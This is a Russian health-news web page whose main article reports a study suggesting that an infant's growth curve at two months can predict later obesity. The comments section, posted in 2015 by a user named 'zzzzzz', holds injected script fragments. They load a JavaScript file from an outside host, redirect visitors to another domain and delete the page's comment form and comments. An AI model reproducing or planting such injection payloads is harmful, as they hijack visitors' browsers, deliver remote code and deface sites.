Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Будет ли ваш ребенок толс...  >>  Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
Обратная связь
 

Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!

Размер шрифта
19 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Особенности физического развития двухмесячных младенцев могут предсказать их вес в будущем – сообщают исследователи из Университета Штата Теннесси.

Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!

«Почти сразу после рождения мы начинаем замечать эту росто-весовую зависимость, которая находит свое отражение в педиатрических кривых и таблицах», – рассказывает Сьюзан Льюдингтон, глава исследования.

Анализируя детские антропометрические характеристики, ученые пришли к следующему выводу: как правило, у детей с нормальным весом показатели массы тела выходили на плато (17 процентиль) в возрасте примерно 2 месяцев, и далее эта тенденция сохранялась вплоть до пяти лет. Другая картина имела место среди детей, у которых впоследствии развивалось ожирение: они пересекали рубеж 17 процентиля примерно в 14 месяцев, и далее кривая веса продолжала подниматься вверх.

Эти данные, опубликованные в издании Clinical Pediatrics, достоверно свидетельствуют о  различиях в физическом развитии у детей с нормальным и девиантным весом даже в самом раннем возрасте.

В исследовании наблюдались более двухсот здоровых детей. В течение пяти лет каждый из них тщательно осматривался не менее девяти раз. Дети из наблюдаемой группы не госпитализировались, медицинские процедуры и лекарственные препараты, способные исказить результат, были исключены.

«Мы старались избежать всех возможных факторов, которые могли бы привести нас к ложным результатам», – объясняет Льюдингтон.

Другой особенностью данного исследования стало активное использование учеными информации о здоровье матери, в частности – об их массе тела до беременности и пристрастии к курению. И то, и другое расценивается как потенциальные факторы, влияющие на вес ребенка в будущем. (Так, в прошлых исследованиях было продемонстрировано, что характер питания матери до и во время беременности может в значительной степени обуславливать изменения гормонального фона ребенка и, соответственно, регуляции аппетита).

Как бы то ни было, Льюдингтон и ее коллеги выяснили, что уже в первые месяцы жизни можно обнаружить зачатки ожирения, которые пышно расцветут с годами. Это предоставляет врачам дополнительную информацию о здоровье ребенка, опираясь на которую можно проводить эффективные профилактические мероприятия. А именно: корригировать схему и рацион питания, режим двигательной активности.

Кроме того, открытие американских ученых представляет интерес в следующем аспекте: оно ставит вопрос о пересмотре возраста, в котором можно формально диагностировать ожирение – в данный момент это допустимо в возрасте двух лет или более.

Ну, а если вас не обследовали в 2 месяца, а сейчас вы страдаете от лишнего веса, то узнайте как Сбросить Лишнее в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Толстейте на здоровье! Сколько лишних килограммов нужно беременным?!   Как воспитывать ребенка, чтобы он не был толстым?   Кесарю кесарево, а ребенку, родившемуся с помощью кесарева сечения, лишний вес!   Набрали вес на ранних сроках беременности? У вас будет толстый ребенок!  
17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца! 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка
 

Слайдшоу

1
Ошибки, которые не позволят вам похудеть к Новому году
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.